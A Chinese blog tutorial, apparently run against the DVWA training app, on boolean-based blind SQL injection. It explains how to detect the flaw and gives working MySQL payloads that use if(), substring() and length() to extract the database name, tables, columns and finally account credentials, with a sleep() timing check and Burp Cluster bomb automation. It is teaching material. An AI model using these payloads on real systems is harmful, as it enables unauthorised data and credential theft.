SQL 注入漏洞（六）布尔型盲注

Aτθ

已于 2022-06-18 00:23:06 修改

阅读量1.1k

点赞数 4

分类专栏： OWASP TOP10 文章标签： web安全

于 2022-06-11 23:49:38 首次发布

本文链接：https://blog.csdn.net/weixin_51730169/article/details/125240102

版权

OWASP TOP10 专栏收录该内容

51 篇文章 20 订阅

订阅专栏

一、代码分析

在页面中不会显示数据库信息，一般情况下只会显示对与错的内容。

在这里插入图片描述

接收 id 的值，直接带入查询，如果存在即返回 users is exists in the database，否则显示 users id is missing。
像这种只有正确与错误页面。页面不会显示数据库里任何内容，如果存在注入，成为盲注。
盲注入的方式有两种：一种是布尔型盲注入，另外一种是延时注入。

二、判断盲注

输入 SQL 注入检测语句，判断页面是否不一样，如果不一样，大概会存在 SQL 注入漏洞。
1'and '1'='1，一样；1'and '1'='2，不一样。
如果输入检测语句，页面没有任何改变，可以使用延时语句检测 1' and sleep(10)--+，函数 sleep() 在 mysql 是延时返回的意思，
以秒为单位，sleep(10) 即延时 10 秒执行。

在这里插入图片描述

三、布尔型注入攻击

1、判断bool盲注

布尔型注入攻击，页面不会返回任何数据库内容，所以不能使用联合查询将敏感信息显示在页面，但是可以通过构造 SQL 语句，获取数据。
布尔型盲注入用到的 SQL 语句 select if(1=1,1,0)。
if()函数在 mysql 是判断，第一个参数表达式，如果条件成立，会显示 1，否则显示 0。1=1 表达式可以换成构造的 SQL 攻击语句。

1' and if(1=1,1,0)--+
页面返回正常，这个语句实际上是 1' and 1，真 and 真，结果为真，1 是存在记录的。所以返回正确页面。

在这里插入图片描述

1' and if(1=2,1,0)--+
页面返回错误，这个语句就是 1' and 0，真 and 假，结果为假，整个 SQL 的值也是 0，所以没有记录，返回错误页面。

在这里插入图片描述

2、获取数据库敏感信息

在黑盒的环境下，通过构造 SQL 注入语句，根据页面的特征确定获取敏感信息。
布尔型盲注入用到的函数：
SUBSTRING()字符串截取，第一个参数是字符串，第二个参数是开始截取位置，第三个是截取的长度。

2.1、查询当前库

select database()查询当前库

在这里插入图片描述

2.2、substring函数

通过 substring 截取截取长度。

在这里插入图片描述

接着再用 if 函数进行构造：
select if(SUBSTRING(database(),1,1)='d',1,0)
判断数据库第一个字是不是字符 d，如果是返回 1 否则返回 0 。

在这里插入图片描述

接着判断第二个字符，将 substring 第二个参数写成 2：
select if(SUBSTRING(database(),2,1)='v',1,0) 
因为要截取第二个字符，第二个字符为 v，如此类推，最后拼接字符就是完整的库名。

在这里插入图片描述

四、在黑盒模式下布尔型注入

先判断注入，判断完注入就获取数据库的长度，得到长度再查询库名，通过库名再查询表，接着通过表查询字段，最后查询某表指定的数据。

1、判断数据库长度

要查询当前库名，首先确定要查询数据库的长度，再通过截取字符进行对比。
1' and if(length(database())=4,1,0)--+

在这里插入图片描述

判断库名的长度为 4

2、判断数据库名

截取第一个字符再进行判断：
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz.@_
每次都要与这些字符进行判断，最后得到 d
1' and if(substring(database(),1,1)='d',1,0)--+

在这里插入图片描述

3、利用 Cluster boomb 测试

1' and if(substring(database(),1,1)='d',1,0)--+
抓包发送到测试模块，选择 Cluster boomb 模式，设置两个变量。

在这里插入图片描述

拼接字符得到库名 dvwa

4、获取表名

4.1、获取第一张表

1' and if(substring((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),1,1)='g',1,0)--+

在这里插入图片描述

4.2、获取第二张表

1' and if(substring((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 1,1),1,1)='u',1,0)--+

在这里插入图片描述

5、获取字段名

5.1、抓包

1'and if(substring((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' and TABLE_SCHEMA=database() limit 0,1),1,1)='i',1,0)--+

当前库的表的第一个列字符是否等于 i ,如果等于 i ,返回正则页面,否则返回错误页面。

在这里插入图片描述

5.2、添加荷载

在这里插入图片描述

5.3、获取user表的字段

在这里插入图片描述

6、获取账号和密码

6.1、先判断查询账号和密码的长度

1' and if((SELECT LENGTH(CONCAT(user,0x3a,PASSWORD)) from users limit 0,1)=38,1,0)--+

在这里插入图片描述

6.2、获取账号和密码

1' and if(substring((select CONCAT(user,0x3a,PASSWORD) from users limit 0,1),1,1)='a',1,0)--+

在这里插入图片描述

最后整理结果得出 admin:5f4dcc3b5aa765d61d8327deb882cf99

Aτθ

关注

4
点赞
踩
12

收藏

觉得还不错? 一键收藏
0
评论
SQL 注入漏洞（六）布尔型盲注

二、判断盲注
复制链接

扫一扫

专栏目录